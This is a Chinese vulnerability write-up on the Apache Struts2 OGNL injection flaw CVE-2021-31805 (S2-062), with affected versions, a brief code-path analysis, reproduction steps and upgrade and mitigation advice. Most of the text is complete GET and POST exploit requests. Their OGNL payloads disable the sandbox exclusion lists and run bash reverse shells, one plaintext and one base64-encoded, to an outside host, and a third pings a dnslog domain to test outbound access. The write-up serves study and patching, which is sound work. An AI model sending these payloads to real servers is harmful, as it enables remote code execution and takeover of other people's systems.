0x00写在前面
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
0x01漏洞描述
2022年04月12日,Apache官方发布了Apache Struts2的风险通告,漏洞编号为CVE-2021-31805,漏洞等级:高危,漏洞评分:8.5。Apache Struts 2是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。在某些标签中若后端通过 %{...} 形式对其属性进行赋值,则将对 OGNL 表达式进行二次解析,从而执行恶意代码,该漏洞是 S2-061 的绕过,后端通过 %{...} 形式对特定标签 name 属性赋值;存在 Commons Collections 3.x 版本依赖。
0x02漏洞影响
2.0.0 <= Apache Struts2 <= 2.5.29
0x03漏洞分析
参考国外分析软文
首先查看前端jsp文件name属性标签,是通过 %{...} 进行赋值后将对 OGNL 表达式进行二次解析,从而执行恶意代码。
struts2运行Action类
maven pom文件如下
xml version="1.0" encoding="UTF-8"?> xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> 4.0.0 SimpleStruts SimpleStruts 1.0-SNAPSHOT war SimpleStruts Maven Webapp http://www.example.com UTF-8 1.8 1.8 junit junit 4.11 test org.apache.struts struts2-core 2.5.26 commons-collections commons-collections 3.2.2 SimpleStruts maven-clean-plugin 3.1.0 maven-resources-plugin 3.0.2 maven-compiler-plugin 3.8.0 maven-surefire-plugin 2.22.1 maven-war-plugin 3.2.2 maven-install-plugin 2.5.2 maven-deploy-plugin 2.8.2
name传参
在Strut2中对jsp中标签处理流程如下
org.apache.struts2.views.jsp.ComponentTagSupport#doEndTag()
函数开始。调用
org.apache.struts2.components.UIBean#end()
函数,然后通过end()函数调用UIBean类的evaluateParams()函数。
跟进evaluateParams函数对标签属性的处理,然后重点关注对name 属性的处理。
最终执行恶意代码。
补丁如下
@org.apache.commons.collections.BeanMap@{}
没有任何沙箱限制,使用特殊的 OGNL 语法直接创建绕过沙箱限制。
0x04漏洞复现
IDE平台下通过tomcat环境外部部署war包复现(也可以docker环境)
通过GET方式将攻击payload进行发送,然后bash反弹shell(明文数据,传输过程中需一次url编码)
GET /Struts2_62_war/S2061.action?payload=(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'bash -c {echo,bash -i >& /dev/tcp/10.211.55.7/12388 0>&1}|{base64,-d}|{bash,-i}'})) HTTP/1.1Host: 10.211.55.2:8080Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Cache-Control: max-age=0Content-Length: 0Cookie: JSESSIONID=51B26DCD798CE551DD2D88CD470D6C5AUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:99.0) Gecko/20100101 Firefox/99.0
成功获取反向shell
通过POST方式将攻击payload进行发送,然后bash反弹shell
POST /s2_062/index.action HTTP/1.1Host:10.211.55.2:38105User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDNT: 1Connection: closeCookie: JSESSIONID=node01c863u8lzu8eyn099a51bjyie0.node0Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwFContent-Length: 1191 ------WebKitFormBoundaryl7d1B1aGsV2wcZwFContent-Disposition: form-data; name="name" (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4yMTEuNTUuNy8xMjM4OCAwPiYx}|{base64,-d}|{bash,-I}'}))
成功获取反向shell
通过dnslog测试是否可以出网
POST /s2_062/index.action HTTP/1.1Host:10.211.55.2:38105User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDNT: 1Connection: closeCookie: JSESSIONID=node01c863u8lzu8eyn099a51bjyie0.node0Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwFContent-Length: 1191 ------WebKitFormBoundaryl7d1B1aGsV2wcZwFContent-Disposition: form-data; name="name" (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'ping ysvrdp.dnslog.cn'}))
成功解析dnslog,可出网
0x05修复建议
目前官方已有可更新版本,用户可升级至 2.5.30 版本:
https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.30
缓解方案
1、可通过设置所有标签中 value="" 来缓解此漏洞;
2、将 org.apache.commons.collections.BeanMap 添加至 excludedClasses 黑名单中。
漏洞自查
通过排查struts-core-版本号.jar来判断是否受此漏洞影响,
如果没有版本号可以在jar文件的META-INF/MANIFEST.MF中搜索Bundle-Version,如果struts-core < 2.5.30则存在该漏洞。
0x05参考链接
https://nox.qianxin.com/vulnerability/detail/QVD-2021-14649
https://cwiki.apache.org/confluence/display/WW/S2-062
https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html
https://github.com/apache/struts/commit/0a75d8e8fa3e75d538fb0fcbc75473bdbff9209e
https://www.freebuf.com/vuls/257626.html